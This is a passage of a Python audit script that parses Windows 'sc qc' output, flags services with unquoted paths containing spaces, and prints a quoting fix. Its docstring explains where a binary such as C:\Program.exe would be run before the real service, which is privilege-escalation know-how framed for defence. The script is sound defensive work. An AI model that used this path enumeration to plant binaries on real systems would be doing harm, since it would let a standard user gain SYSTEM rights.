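        BINARY_PATH_NAME   : C:\\Program Files\\EGSoftWeb\\EG Anti Virus\\egavser.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Service For EG Free AntiVirus
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(output: str) -> dict:
    """Turn 'sc qc' output ('KEY : value' lines) into a dict."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def image_path(binary_path: str):
    """Split BINARY_PATH_NAME into (executable, quoted?).

    For an unquoted value the executable is taken to end at the first
    '.exe'; anything after it is service arguments.
    """
    if binary_path.startswith('"'):
        return binary_path[1:binary_path.find('"', 1)], True
    m = re.match(r"(.*?\.exe)\b", binary_path, re.IGNORECASE)
    return (m.group(1) if m else binary_path), False


def search_dirs(exe: str) -> list:
    """Directories in which a binary named after a space-delimited prefix
    would be picked up before the real image (e.g. C:\\Program.exe)."""
    parts = exe.split(" ")
    dirs = []
    for i in range(1, len(parts)):
        d = ntpath.dirname(" ".join(parts[:i]))
        if d and d not in dirs:
            dirs.append(d)
    return dirs


def analyse_service(sc_output: str) -> dict:
    fields = parse_sc_qc(sc_output)
    exe, quoted = image_path(fields.get("BINARY_PATH_NAME", ""))
    vulnerable = (not quoted) and " " in exe
    name = fields.get("SERVICE_NAME", "?")
    return {
        "service": name,
        "runs_as": fields.get("SERVICE_START_NAME", "?"),
        "auto_start": "AUTO_START" in fields.get("START_TYPE", ""),
        "unquoted_with_spaces": vulnerable,
        # Write ACLs here must not include standard users (check with icacls).
        "audit_write_acl_on": search_dirs(exe) if vulnerable else [],
        # Remediation: re-register the path with embedded quotes.
        "fix": f'sc config "{name}" binPath= "\\"{exe}\\""' if vulnerable else None,
    }


if __name__ == "__main__":
    for key, value in analyse_service(SC_QC_SAMPLE).items():
        print(f"{key:22} {value}")
```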